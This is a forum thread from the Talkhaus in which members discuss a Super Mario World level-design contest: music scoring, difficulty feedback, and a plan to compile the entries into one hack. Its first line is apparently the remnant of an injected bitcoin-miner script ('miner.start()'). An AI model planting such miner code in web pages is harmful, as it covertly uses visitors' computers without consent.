miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralmario fan games galaxy

The Talkhaus "Make A Good Level" Contest -- Discussion

they were fun, but now they're done
Paperkoopa

Re: The Talkhaus "Make A Good Level" Contest -- Discussion

Postby Paperkoopa » 7 years ago

I got so depressed as I find myself unable to add a single piece of custom music :oops:
I haven't even started at the leveldesign, but got the main idea ready.
I just hope to be able to finish it in time :|

FPzero
Try new Phazon Ice(TM), blue, refreshing, horribly mutagenic!

Postby FPzero » 7 years ago

When Music says 5 points, how much does vanilla music factor? Is it still possible to get a full 5 points if appropriate vanilla music is used, or do I have to search around for some custom track to add?

Paperkoopa

FirePhoenix wrote:When Music says 5 points, how much does vanilla music factor? Is it still possible to get a full 5 points if appropriate vanilla music is used, or do I have to search around for some custom track to add?
I'm going for a completely vanilla level, so I kinda hope that the 8 tracks that SMW offers are enough too. :/

limepie20

Postby limepie20 » 7 years ago

If vanilla music fits really well, I'll give it a 5. If it fits with the theme but could be better, I'd give it a 4. So just have the song feel like yes, it's for this level not just for this theme if that makes sense.

Although, I'm pretty sure argu will give a 5 for music unless it blatantly doesn't fit.

edit:
Paperkoopa wrote:
FirePhoenix wrote:When Music says 5 points, how much does vanilla music factor? Is it still possible to get a full 5 points if appropriate vanilla music is used, or do I have to search around for some custom track to add?
I'm going for a completely vanilla level, so I kinda hope that the 8 tracks that SMW offers are enough too. :/
Well I hope you don't mean the number isn't physically enough because, remember, focus is worth more than music.

Argumentable
the biggest shit

Postby Argumentable » 7 years ago

Actually I hate a lot of music so I'll probably give a lot of people a 3 but at least it will be a consistent score

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 7 years ago

I've been wondering about this, but this may take some work, and some people might object outright, but, well, we'll never know unless I ask, and also, yes.

Basically: since it's mostly talkhausers that are part of the project, I've been wondering if it would be possible to put all the submissions together in a little hack. A sort of 'Asmt 1.5'. I know it would be unthinkable for the smwcentral contests because there are just so many levels that get put out, but for this contest we're looking at what, about twenty entries, giving enough time for the week-end?

The reason why this isn't an 'oh man we really should do this!!' is because this would require some work since i'm sure a lot of people that used custom stuff basically used the same map16/sprite slots and whatnot, so some rejiggering would unfortunately be necessary. On the other hand, I think it'd be nice to have them all together and 'immortalised' in a way that is playable for peeps.

I dunno. I dunno? I dunno.
the chillaxest of dragonsImage
ImageImage

Paperkoopa

Sounds pretty great actually.
I wouldn't mind some litte colaboration of most talkhausers at all.
Custom stuff won't be that big of a problem, as there is by far enough space for sprites/music/etc. (although some sorting and swapping might be required)

I guess we'll have to put up some sub-forum in order to organize and plan such stuff, but you can count on my vote/work for sure!

Argumentable
the biggest shit

We'll have to wait and see the levels first

Paperkoopa

Argumentable wrote:We'll have to wait and see the levels first
Obviously. Just saying, a quick colab of ~20 people sounds great. ;)

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 7 years ago

I have no problem with that, all I'd have to do more is supply the .txt file for Sky High's music.

MrDeePay

Postby MrDeePay » 7 years ago

Hey Tom and Jolpengammler, please have some regard to players that don't use ZSNES. Your level's music completely fucks up in Snes9x 1.52+ due to the music issues from back on SMWC last year. Seriously, it's unbearable.

I've played through a few entries in this contest; most of which had some neat things going for them at least. I can go into more detail if you like about what I did play.

raocow
the death of the incredible huge
Location: maybe the Wizards are the most complex, and the sales guys are up their daily

Postby raocow » 7 years ago

If you do, can you put it in spoiler? I'm looking foward to discovering neat things!
the chillaxest of dragonsImage
ImageImage

Patgangster

Postby Patgangster » 7 years ago

MrDeePay wrote:I've played through a few entries in this contest; most of which had some neat things going for them at least. I can go into more detail if you like about what I did play.
I'm not sure if you have played my entry, but even then I would like to see some cool feedbacks on them entries, though it might be a good idea to do it in pms or wait doing it until after the deadline or even after judging in case your opinion's gonna affect other people's opinions. Or something like that.

Kerkec

Postby Kerkec » 7 years ago

Hmm, looking back, I think my entry is ridiculously flawed in that it's essentially impossible to beat without dying at least once to test something out, which really shouldn't happen. Granted, it's easy to get back to that point once you know what you're doing, but still. SMW is not about trial and error, and I don't think I really thought that part through too well. I don't really know how I'd change it, and I don't really feel like changing it now anyway.
Also the entire level as a whole is probably just meh.

As for collaborating all of these into a neat little package, that sounds like a cool idea, but being the newbie that I am with this sort of thing, I think I'll need to be told exactly what to do. All I have that's not vanilla are like two changes to the graphics, one of which isn't even important at all, in retrospect. But the other is kind of necessary.

Oh, oh, also
My level kind of assumes that it was going to be played on its own, so Mario would start small. And that should probably be true for all the entries, I guess. Would the collaborated hack have a thing to set Mario to lose all power-ups when he enters levels?

notgoodwithusernames

Postby notgoodwithusernames » 7 years ago

So what do you guys think of my entree, because I think the difficulty is on the unfair side, but I'm not really sure.
I don't sign on here a whole bunch, so here are some contacts if you need to get a hold of me:

SMWCentral: http://www.smwcentral.net/?p=profile&id=12089
Youtube: http://www.youtube.com/user/notgoodwithusername5

yogui
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
Banned
First name: guy who made something

Postby yogui » 7 years ago

I'm playing the entries right now because why not. I can post some comments about people's levels if they want, but only after the deadline is over so you can't change your level. :twisted:
And there is way too many jokes entries in this contest and they ain't even funny.

Also TomPhanto I think you forgot to remove a teleport tile at the start of the level. Fix that before it's too late. But maybe I'm playing an version 1, I dunno. You should look.
[enable_hats][/enable_hats]

Paperkoopa

I don't know, what did you guys think about my level? (without spoilering anything for the jury)
I tried to keep it in a difficulty that the original game would have around mid- to endgame. Also I think the level was a pretty focused and all that. I hope it doesn't get rated that bad :)

Kerkec

Postby Kerkec » 7 years ago

Okay, I lied. I did go back to change a few things in my entry. Guess this'll have to do.

And to anyone saying they'll give feedback, it would be very appreciated, but yeah, spoilerbox that stuff.

kirbyy

Postby kirbyy » 7 years ago

notgoodwithusernames wrote:So what do you guys think of my entree, because I think the difficulty is on the unfair side, but I'm not really sure.
I liked it but I did think it was kind of hard. I got to about 2/3 with 15 lives lost and then I just used save states to check out the rest. Some of the note-block jumps were really tricky, especially the one where the extending yellow-block-thingy blocked your path. Those were a bit unfair because they're much harder as large mario because you hit your head against them, basically punishing players for being large.
Paperkoopa wrote:I don't know, what did you guys think about my level? (without spoilering anything for the jury)
I tried to keep it in a difficulty that the original game would have around mid- to endgame. Also I think the level was a pretty focused and all that. I hope it doesn't get rated that bad :)
it was very doable, beat it without dying once. The difficulty was somewhere around world 5 or 6 in SMW I'd venture. I only played it once but I thought it was cool.
edit: spoiler!

Also I tried your level too Kerkec but I didn't get very far. I don't really have the patient for haunted houses kind of levels I think.

Argumentable
the biggest shit

notgoodwithusernames wrote:So what do you guys think of my entree, because I think the difficulty is on the unfair side, but I'm not really sure.
It's awful you lose the contest

yogui
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥
Banned
First name: guy who made something

Postby yogui » 7 years ago

What? notgoodwithusernames's level is the one called bubble trouble right?
Because I didn't find this level too hard. It had a normal difficulty, maybe a little difficult. Maybe it's because I'm used to play Mario hacks, but still I don't know why you think it is "unfair".
[enable_hats][/enable_hats]

kirbyy

Postby kirbyy » 7 years ago

yogui wrote:What? notgoodwithusernames's level is the one called bubble trouble right?
Because I didn't find this level too hard. It had a normal difficulty, maybe a little difficult. Maybe it's because I'm used to play Mario hacks, but still I don't know why you think it is "unfair".
Well maybe that's just me.
I thought the note block section with the extending blocks above them were unfair, the rest was ok if not difficult in my opinion. Then again I'm not the best Mario player (not raocow-level anyway) so maybe that accounts for our differences in perception.

patrickgh3

Postby patrickgh3 » 7 years ago

In response to raocow's proposition, I'm personally for it and would be willing to do some work to make it happen. I think it would be cool to be somewhat immortalized :P

Frozelar
Retired Screamer

Postby Frozelar » 7 years ago

Darn, I hope this contest thing doesn't like become a trainwreck or anything like that considering the amount of joke levels there supposedly are.

Also just gotta get a couple peeps to test my level then I'll submit it :D

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 7 years ago

I'd love to have my level in some sort of compilation thingie, and if anything I'd probably enjoy figuring out how to fix all the shoddy programming so that it works in such a setting. I will say that, as someone who put WAY too much time into editing the overworld and making little throw-away one-screen levels, that I'd be sad to lose any of that, but it is a "make a level," contest, not a "make a level + miscellaneous addenda" contest.

Return to “old contests”